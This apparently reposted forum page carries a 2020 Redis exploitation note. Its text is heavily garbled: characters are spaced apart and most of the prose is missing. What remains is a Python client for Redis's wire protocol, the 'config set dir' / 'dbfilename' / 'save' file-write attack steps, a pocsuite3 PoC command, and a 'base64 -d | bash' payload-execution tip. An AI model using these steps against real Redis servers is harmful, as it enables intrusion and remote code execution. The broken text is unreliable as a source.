[17902] 2020-06-10_redisexp研究.

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-06-10_redisexp研究.md r e d i s   e x p . m d   w 8 a y   H a c k i n g   2 0 2 0 - 0 6 - 1 0 p o c r e d i s h t t p s : / / p a p e r . s e e b u g . o r g / ? k e y w o r d = r e d i s   L u a   r c e l u a   r c e r e d i s   p o c r e d i s   c l i e n t , r e d i s   c l i e n t v u l h u b D E L I M I T E R   =   b " r n " c l a s s   R e d i s C l i e n t ( o b j e c t ) :         d e f   _ _ i n i t _ _ ( s e l f ,   r h o s t ,   r p o r t ) :                 s e l f . c l i e n t   =   s o c k e t . c r e a t e _ c o n n e c t i o n ( ( r h o s t ,   r p o r t ) ,   t i m e o u t = 2 0 )         d e f   s e n d ( s e l f ,   d a t a ) :                 d a t a   =   s e l f . e n c o d e ( d a t a )                 s e l f . c l i e n t . s e n d ( d a t a )                 l o g g e r . i n f o ( " s e n d   d a t a :   % r " ,   d a t a )                 r e t u r n   s e l f . r e c v ( )         d e f   r e c v ( s e l f ,   c o u n t = 6 5 5 3 5 ) :                 d a t a   =   s e l f . c l i e n t . r e c v ( c o u n t )                 l o g g e r . i n f o ( " r e c e i v e   d a t a :   % r " ,   d a t a )                 r e t u r n   d a t a         d e f   e n c o d e ( s e l f ,   d a t a ) :                 i f   i s i n s t a n c e ( d a t a ,   b y t e s ) :                         d a t a   =   d a t a . s p l i t ( )                 a r g s   =   [ b ' * ' ,   s t r ( l e n ( d a t a ) ) . e n c o d e ( ) ]                 f o r   a r g   i n   d a t a :                         a r g s . e x t e n d ( [ D E L I M I T E R ,   b ' $ ' ,   s t r ( l e n ( a r g ) ) . e n c o d e ( ) ,   D E L I M I T E R ,   a r g ] )                 a r g s . a p p e n d ( D E L I M I T E R )                 r e t u r n   b ' ' . j o i n ( a r g s )
r e d i s r e d i s r e d i s r e d i s   / d a t a / t e s t p o c i n f o   s e r v e r p i n g i n f o   s e r v e r s e t   x   p a y l o a d c o n f i g   s e t   d i r   / d a t a c o n f i g   s e t   d b f i l e n n a m e   t e s t s a v e
, p s :   p o c s u i t e 3 p o c   - - c o n t e n t   x x x   - - f i l e n a m e   / d a t a / f l a g   r e d i s d o c k e r a l p i n e d e b i a n 使 西 m a k e f i l e f i l e n a m e c o n t e n t
s o r e d i s 2 0 k 2 0 0 k 2 0 0 k p o c t i p s b a s e 6 4 s h e l l e c h o   " b a s e 6 4   p y l o a d " | b a s e 6 4   - d | b a s h

p o c s h e l l 便 r e d i s p o c p o c r e d i s p o c 使 r e d i s 便 p o c s u i t e 3
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则